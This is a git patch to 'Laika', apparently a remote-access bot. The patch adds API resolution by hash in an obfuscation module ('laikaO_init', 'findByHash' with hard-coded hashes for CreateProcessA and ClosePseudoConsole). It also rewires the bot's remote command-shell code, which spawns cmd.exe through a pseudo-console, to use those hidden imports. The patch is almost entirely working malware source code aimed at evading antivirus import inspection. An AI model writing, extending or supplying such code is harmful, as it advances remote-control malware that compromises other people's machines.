From fdbe6cf3c78148490ec33302641ee2501b324f51 Mon Sep 17 00:00:00 2001
From: CPunch <sethtstubbs@gmail.com>
Date: Fri, 8 Jul 2022 16:12:27 -0500
Subject: [PATCH] Bot: More APIs added to laikaO_init()

- Misc. functions converted to their UTF-8 version
- ClosePseudoConsole & CreateProcessA are now manually 'linked' during runtime
---
 bot/include/obf.h  |  4 ++++
 bot/win/winobf.c   | 13 +++++--------
 bot/win/winshell.c | 12 ++++++------
 3 files changed, 15 insertions(+), 14 deletions(-)

diff --git a/bot/include/obf.h b/bot/include/obf.h
index dd7d579..6b8769a 100644
--- a/bot/include/obf.h
+++ b/bot/include/obf.h
@@ -10,9 +10,13 @@
 /* WINAPI types */
 typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, INT);
 typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, HPCON *);
+typedef void(WINAPI *_ClosePseudoConsole)(HPCON);
+typedef BOOL(WINAPI *_CreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
 
 extern _ShellExecuteA oShellExecuteA;
 extern _CreatePseudoConsole oCreatePseudoConsole;
+extern _ClosePseudoConsole oClosePseudoConsole;
+extern _CreateProcessA oCreateProcessA;
 #endif
 
 void laikaO_init();
diff --git a/bot/win/winobf.c b/bot/win/winobf.c
index b5363e1..3bb17e3 100644
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
@@ -137,10 +137,10 @@ _findByHashFail:
 
 _ShellExecuteA oShellExecuteA;
 _CreatePseudoConsole oCreatePseudoConsole;
+_ClosePseudoConsole oClosePseudoConsole;
+_CreateProcessA oCreateProcessA;
 
-/* todo api:
-    ClosePseudoConsole
-    CreateProcessA
+/* TODO:
     GetEnvironmentVariable
 */
 
@@ -151,13 +151,10 @@ void laikaO_init()
     /* TODO: these library strings should probably be obfuscated (by a skid box maybe?) */
     oShellExecuteA = (_ShellExecuteA)findByHash("shell32.dll", 0x89858cd3);
     oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
+    oClosePseudoConsole = (_ClosePseudoConsole)findByHash("kernel32.dll", 0xeff42590);
+    oCreateProcessA = (_CreateProcessA)findByHash("kernel32.dll", 0x9e687c1d);
 
 /*
-    hash = getHashName("CreateProcessA"); // 0x9e687c1d
-    printf("CreateProcessA: real is %p, hashed is %p. [HASH: %x]\n",
-           (void *)CreateProcessA,
-           findByHash("kernel32.dll", hash), hash);
-
     hash = getHashName("InitializeProcThreadAttributeList");
     printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
            (void *)InitializeProcThreadAttributeList,
diff --git a/bot/win/winshell.c b/bot/win/winshell.c
index 80165bb..4ae1f7f 100644
--- a/bot/win/winshell.c
+++ b/bot/win/winshell.c
@@ -24,7 +24,7 @@ HRESULT InitializeStartupInfoAttachedToPseudoConsole(STARTUPINFOEX *pStartupInfo
 
 struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int rows, uint32_t id)
 {
-    TCHAR szComspec[MAX_PATH];
+    CHAR szComspec[MAX_PATH];
     struct sLaika_RAWshell *shell =
         (struct sLaika_RAWshell *)laikaM_malloc(sizeof(struct sLaika_RAWshell));
     HRESULT hr;
@@ -40,7 +40,7 @@ struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int ro
     }
 
     /* get user's shell path */
-    if (GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) == 0) {
+    if (GetEnvironmentVariableA("COMSPEC", szComspec, MAX_PATH) == 0) {
         laikaM_free(shell);
         return NULL;
     }
@@ -48,14 +48,14 @@ struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int ro
     /* create process */
     hr = InitializeStartupInfoAttachedToPseudoConsole(&shell->startupInfo, shell->pseudoCon);
     if (hr != S_OK) {
-        ClosePseudoConsole(shell->pseudoCon);
+        oClosePseudoConsole(shell->pseudoCon);
 
         laikaM_free(shell);
         return NULL;
     }
 
     /* launch cmd shell */
-    hr = CreateProcess(NULL,                            /* No module name - use Command Line */
+    hr = oCreateProcessA(NULL,                            /* No module name - use Command Line */
                        szComspec,                       /* Command Line */
                        NULL,                            /* Process handle not inheritable */
                        NULL,                            /* Thread handle not inheritable */
@@ -72,7 +72,7 @@ struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int ro
         DeleteProcThreadAttributeList(shell->startupInfo.lpAttributeList);
         laikaM_free(shell->startupInfo.lpAttributeList);
 
-        ClosePseudoConsole(shell->pseudoCon);
+        oClosePseudoConsole(shell->pseudoCon);
 
         laikaM_free(shell);
         return NULL;
@@ -97,7 +97,7 @@ void laikaB_freeRAWShell(struct sLaika_bot *bot, struct sLaika_shell *_shell)
     laikaM_free(shell->startupInfo.lpAttributeList);
 
     /* close pseudo console */
-    ClosePseudoConsole(shell->pseudoCon);
+    oClosePseudoConsole(shell->pseudoCon);
 
     /* free shell struct */
     laikaM_free(shell);